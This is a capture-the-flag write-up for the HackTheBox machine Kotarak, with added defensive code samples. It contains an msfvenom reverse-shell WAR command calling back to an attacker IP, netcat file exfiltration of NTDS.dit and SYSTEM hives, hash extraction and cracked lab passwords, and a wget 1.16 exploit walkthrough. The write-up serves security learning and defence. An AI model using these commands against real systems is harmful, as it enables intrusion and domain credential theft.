HTB Write-up Kotarak
nmap:
8009 enum:
8080 enum:
Apache Tomcat/8.5.5
dirsearch result:
index.jsp took me to the tomcat page:
Attempted logging in to host-manager but I got this
s3cret?
tomcat / s3cret didn't work.. lol
After running the full scan, I found port 60000 open
Possibly an LFI vuln?
It looks like you can enter any URL to browse, so I entered my own and served an HTTP server.
it worked.
If we see the user agent here we could exploit it, but not this time.
Let's enter some values like file://etc/passwd
ok..
Now we can fuzz the local ports with wfuzz
Got a bunch of results with 2 lines (2L), so let's modify our command.
--hl=2 hides every result whose response is 2 lines long.
We can see some stuff coming back.
On port 888, found a file server.
After URL encoding the last part of the request with Burp, I was able to see the content.
username: admin
password: 3@g01PdhB!
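The root cause of everything from file://etc/passwd to the port fuzzing is that the service on 60000 fetches whatever URL the user supplies. Below is an added example (my own code, not anything from the box) of the input check such a "browse any URL" feature should have done: refuse non-HTTP schemes, refuse literal loopback/private addresses, and resolve hostnames before deciding, so a name that points at 127.0.0.1 is caught too. The resolver is injectable so the logic can be exercised offline; the hostnames in the usage are made up.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Schemes the "browse any URL" feature legitimately needs. file:// (used above
# to read /etc/passwd) and every other scheme are refused before any fetch.
ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """Resolve a hostname to the set of addresses it points at (real DNS lookup)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def validate_fetch_url(url, resolver=resolve_host):
    """Return (ok, reason) for a user-supplied URL the server is asked to fetch.

    Rejects non-HTTP schemes, literal loopback/private/link-local addresses
    (which is what the port fuzzing against localhost above relied on), and
    hostnames that resolve to such addresses. `resolver` is injectable so the
    check can be tested without network access.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r is not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    try:
        addresses = {str(ipaddress.ip_address(host))}   # literal IP, v4 or v6
    except ValueError:
        try:
            addresses = resolver(host)                  # hostname: look it up
        except (socket.gaierror, OSError):
            return False, "host %r does not resolve" % host
    for text in addresses:
        try:
            addr = ipaddress.ip_address(text)
        except ValueError:
            return False, "unparseable address %r for host %r" % (text, host)
        # is_global is False for loopback, RFC 1918, link-local, 0.0.0.0, ::1, ...
        if not addr.is_global:
            return False, "host %r resolves to non-public address %s" % (host, addr)
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs mirroring what was tried against the box.
    for candidate in ("file://etc/passwd", "http://127.0.0.1:888/", "http://[::1]:8080/"):
        print(candidate, "->", validate_fetch_url(candidate))
    print(validate_fetch_url("http://example.com/", resolver=lambda h: {"93.184.216.34"}))
```

One caveat for anyone wiring this into a real fetcher: the address that passed the check must be the one actually connected to (connect by IP and set the Host header yourself), otherwise a second DNS lookup at connect time can return a different answer.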
Now we are finally in the admin portal.
Make a WAR reverse shell with msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.14 LPORT=7777 -f war > shell.war
Got an initial shell back after deploying the war file and starting a nc listener.
Spawn a proper tty: python -c 'import pty;pty.spawn("/bin/bash")'
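From the defender's side, the WAR deploy above leaves a clear trace in Tomcat's access log. The following is an added example (not part of the write-up or of Tomcat) that parses lines in Tomcat's default "common" AccessLogValve format, flags PUT/POST requests to the manager's deploy endpoints (/manager/html/upload for the form used here, /manager/text/deploy for the scripted interface) and counts 401s under /manager/ per source IP as a credential-guessing signal. The log lines are constructed for the example; the nonce, the second IP and the user names are made up.

```python
import re

# Tomcat's default AccessLogValve pattern "common": %h %l %u %t "%r" %s %b
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Manager application endpoints that deploy a WAR: the HTML form upload used
# above and the text-interface deploy command used by scripts and CI.
DEPLOY_ENDPOINTS = ("/manager/html/upload", "/manager/text/deploy")

# Constructed sample log (not from the box). Attacker IP taken from the write-up.
SAMPLE_LOG = """\
10.10.16.14 - - [21/Jul/2017:11:40:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.14 - - [21/Jul/2017:11:40:05 +0000] "GET /host-manager/html HTTP/1.1" 401 2473
10.10.16.14 - admin [21/Jul/2017:11:40:09 +0000] "GET /manager/html HTTP/1.1" 200 19320
10.10.16.14 - admin [21/Jul/2017:11:41:12 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 20071
10.10.16.14 - - [21/Jul/2017:11:41:15 +0000] "GET /shell/ HTTP/1.1" 200 -
192.168.110.5 - deployer [21/Jul/2017:11:45:00 +0000] "PUT /manager/text/deploy?path=/app&update=true HTTP/1.1" 403 1203
10.10.16.14 - - [21/Jul/2017:11:46:00 +0000] "GET /index.jsp HTTP/1.1" 200 11286
""".splitlines()


def parse_access_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = ACCESS_RE.match(line.strip())
    return m.groupdict() if m else None


def is_deploy_request(rec):
    """True for a PUT/POST whose path (query string stripped) is a deploy endpoint."""
    endpoint = rec["path"].split("?", 1)[0]
    return rec["method"] in ("PUT", "POST") and endpoint in DEPLOY_ENDPOINTS


def find_deploys(lines):
    """Return deploy attempts in log order, each tagged with whether Tomcat accepted it."""
    events = []
    for line in lines:
        rec = parse_access_line(line)
        if rec and is_deploy_request(rec):
            events.append({
                "ip": rec["ip"],
                "user": rec["user"],
                "when": rec["ts"],
                "endpoint": rec["path"].split("?", 1)[0],
                "accepted": rec["status"].startswith("2"),
            })
    return events


def manager_auth_failures(lines):
    """Count 401 responses under /manager/ per source IP (credential guessing signal)."""
    counts = {}
    for line in lines:
        rec = parse_access_line(line)
        if rec and rec["path"].startswith("/manager/") and rec["status"] == "401":
            counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for event in find_deploys(SAMPLE_LOG):
        print("deploy:", event)
    print("401s under /manager/:", manager_auth_failures(SAMPLE_LOG))
```

Tomcat does not log the request body, so the uploaded WAR's name is not in the access log; a successful POST to /manager/html/upload followed shortly by a GET to a context path nobody deployed on purpose (here /shell/) is the pattern to alert on.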
backups looks interesting
find . --> useful to find hidden files.
Started a listener on kali: nc -nvlp 443 > SYSTEM
nc 10.10.16.14 443 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
Did the same for the other file.
Now we've got the two files on our machine.
What is the NTDS.dit File?
The NTDS.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators.
Extracting Hashes and Domain Info From .dit
If you have the NTDS.dit file and the SYSTEM hive, you can simply use secretsdump.py from impacket to extract all the NT hashes, but before we begin we need to download the files locally so we can extract the database information. I'm going to create a simple Python HTTP server to transfer the files from the remote victim machine to my local machine.
It took forever to download these files! I tried the nc methods but I couldn't see the progress, so the files kept corrupting.
Output
Time to crack some hashes!
Since the box is not Windows, we have to crack them. We can ignore the accounts ending with $ (machine accounts).
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Cut each line before the fourth colon: the last field kept is the NT hash.
Used this site to crack them.
admin cracked:
f16tomcat!
atanas - Password123!
Let's try ssh into these.
couldn't get in...
Tried using su - atanas with the other password and it worked.
it looks like ssh is not enabled for this account.
Priv Esc
In the root folder, we can actually read app.log and flag.txt.
wget 1.16...
Let's do searchsploit to see what we have.
exploit DB: https://www.exploit-db.com/exploits/40064
Pasted the wget.rc content in the /dev/shm folder.
You cannot run a Python server on port 21, but the box has a program called authbind installed that bypasses this.
Uploading the wget exploit file to the victim (modified some parts).
Used wget -r http://IP/exploit.py to transfer the file.
Changed the HTTP server to listen on 0.0.0.0.
In summary: we need to have the Python server and the FTP server running on the victim's machine,
and nc running on the attacker's.
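The weakness exploit 40064 targets in wget 1.16 is that, when the server redirects the download, wget took the local file name from the redirect target rather than from the URL it was asked for, so a redirect to an FTP URL ending in .wgetrc chose the name and dropped a config file into the working directory. wget 1.18 changed the default to derive the name from the original URL (the old behaviour is now opt-in via --trust-server-names). The block below is an added simulation of my own, not wget's code: it contrasts the two name derivations as pure functions and adds an allow-list on the redirect scheme and a dotfile refusal as extra checks of mine. The attacker.example host is a placeholder.

```python
import posixpath
from urllib.parse import unquote, urlsplit


def name_from_url(url):
    """Local file name a downloader derives from a URL: the last path component,
    or index.html when the path ends in '/'."""
    base = posixpath.basename(unquote(urlsplit(url).path))
    return base or "index.html"


def output_name_trusting_redirect(requested_url, final_url):
    """Pre-1.18 behaviour (and --trust-server-names today): the name is taken from
    wherever the redirect ended up, so whoever controls the redirect chooses it."""
    return name_from_url(final_url)


def output_name_hardened(requested_url, final_url,
                         allowed_redirect_schemes=("http", "https")):
    """Safer derivation (assumed policy, not wget's exact code): the name comes from
    the URL the caller asked for (the wget 1.18 default), the redirect target's scheme
    must be on an allow-list, and dotfiles / odd names are refused."""
    final_scheme = urlsplit(final_url).scheme.lower()
    if final_scheme not in allowed_redirect_schemes:
        raise ValueError("refusing redirect to %s:// URL %s" % (final_scheme, final_url))
    name = name_from_url(requested_url)
    if name in (".", "..") or name.startswith(".") or "\\" in name:
        raise ValueError("unsafe output file name %r" % name)
    return name


def raises_value_error(fn, *args):
    """Small helper so callers can check the refusal paths without try/except."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed exchange: the client asks for exploit.py, the server answers with
    # a redirect to an FTP URL whose last component is .wgetrc.
    requested = "http://attacker.example/exploit.py"
    redirected = "ftp://attacker.example/.wgetrc"
    print("old wget would save as:", output_name_trusting_redirect(requested, redirected))
    print("hardened, ftp allowed  :", output_name_hardened(requested, redirected,
                                                           ("http", "https", "ftp")))
    print("hardened, default      :", "refused" if raises_value_error(
        output_name_hardened, requested, redirected) else "accepted")
```

Note that the "ftp allowed" call still yields exploit.py: with the 1.18 rule alone the redirect is followed but no longer picks the file name, which is what closed the write-anywhere-in-cwd behaviour the exploit relies on.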
/root/hacked-via-wget